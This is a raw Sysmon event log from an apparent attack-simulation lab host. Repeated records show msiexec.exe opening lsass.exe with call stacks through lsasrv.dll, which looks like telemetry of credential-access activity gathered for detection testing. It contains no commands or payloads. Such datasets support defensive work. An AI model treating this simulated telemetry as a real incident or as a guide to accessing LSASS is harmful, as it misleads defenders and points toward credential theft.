15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694754Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694753Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694752Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694751Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694750Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694749Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694748Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694747Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694746Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694745Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694744Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694743Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694742Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694741Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694740Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694739Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694738Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694737Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694736Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694735Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694734Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694733Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694732Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 